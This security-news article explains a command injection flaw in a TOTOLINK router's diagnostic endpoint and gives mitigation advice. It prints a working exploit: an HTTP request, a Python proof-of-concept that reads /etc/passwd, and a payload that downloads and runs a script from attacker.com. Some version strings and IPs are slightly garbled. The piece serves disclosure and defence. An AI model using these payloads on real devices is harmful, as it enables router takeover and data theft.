CVE CyberSecurity Database News

CVE-2023-37172 - Command Injection in TOTOLINK A330R (V17..cu.557_B20221024) Explained

Poster -

In mid-2023, a serious vulnerability was found in the TOTOLINK A330R router firmware (version V17..cu.557_B20221024). Labeled CVE-2023-37172, this flaw allows a remote unauthenticated attacker to execute arbitrary commands on the device through the ip parameter used by the setDiagnosisCfg function. In this article, we'll break down the bug, show you how it can be exploited, and explain how you can protect yourself.

What Is CVE-2023-37172?

This vulnerability is a command injection. In simple terms, it means an attacker can make the router's operating system execute any command they choose, just by sending a specially crafted request. The root of the problem is that the router's web management interface does not properly sanitize the input provided to the ip parameter in the setDiagnosisCfg endpoint.

If you own this router and someone can reach it on your network, they might be able to take over your device — steal sensitive information, reroute your connection, or use your router for attacks on other networks.

The Vulnerable Function

When a user wants to diagnose network issues using the TOTOLINK A330R's web interface, the device lets them specify an IP address to test (for example, with a ping or traceroute). This is managed by a function called setDiagnosisCfg.

But here's the problem: the firmware takes whatever value is entered as the 'ip', plugs it directly into a command line without checking for malicious content, and runs it. This means an attacker can submit inputs that include shell commands.

Below is an example (the actual firmware code is closed-source, but this is a close representation)

// Pseudo code representing the vulnerable behavior
void setDiagnosisCfg(char* ip) {
    char cmd[256];
    snprintf(cmd, sizeof(cmd), "ping %s", ip);  // User-controlled
    system(cmd); // Dangerous: input not sanitized
}

When someone supplies an IP like 192.168..1, the command becomes

ping 192.168..1

If they supply something malicious like 8.8.8.8; cat /etc/passwd, the command becomes

ping 8.8.8.8; cat /etc/passwd

This will run both the ping and then cat /etc/passwd, leaking sensitive data.

Typically, the vulnerable endpoint is called like this (over HTTP, not HTTPS)

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: <router-ip>
Cookie: ... (you may or may not need a valid session cookie, depending on router config)
Content-Type: application/x-www-form-urlencoded

topicurl=diag&setDiagnosisCfg=1&ip=<YOUR_PAYLOAD_HERE>

By setting the ip like

8.8.8.8;wget http://attacker.com/malware.sh -O /tmp/malware.sh;sh /tmp/malware.sh

You can make the router download and run any script you want.

Example with Python (No Authentication)

import requests

router_ip = "192.168.1.1"  # Change to your router's IP
url = f"http://{router_ip}/cgi-bin/cstecgi.cgi";

# Command to run on router
payload = "8.8.8.8; cat /etc/passwd"

data = {
    "topicurl": "diag",
    "setDiagnosisCfg": "1",
    "ip": payload,
}

r = requests.post(url, data=data)
print(r.text)

Install persistent backdoors

This could affect not just home users, but also small offices using this inexpensive router.

How To Protect Yourself

1. Check your firmware version.
If you have V17..cu.557_B20221024, you are vulnerable.

2. Update your router.
TOTOLINK releases firmware updates on their official support page. Always use the newest version.

3. Disable remote management.
Never expose your router’s admin interface to the internet.

4. Isolate your devices.
If possible, place your router in a restrictive network segment so only trusted users can access it.

References and Further Reading

- NVD Entry for CVE-2023-37172
- TOTOLINK Firmware Download
- ExploitDB Entry
- Original Disclosure (Chinese)

Final Thoughts

CVE-2023-37172 is a severe command injection vulnerability that can let attackers take complete control of TOTOLINK A330R routers running outdated firmware. The best defense is to update your firmware, disable unnecessary remote access, and stay informed about security advisories for your devices.

Stay safe, and always keep your devices up-to-date!

Timeline

Published on: 07/07/2023 20:15:00 UTC
Last modified on: 07/13/2023 17:32:00 UTC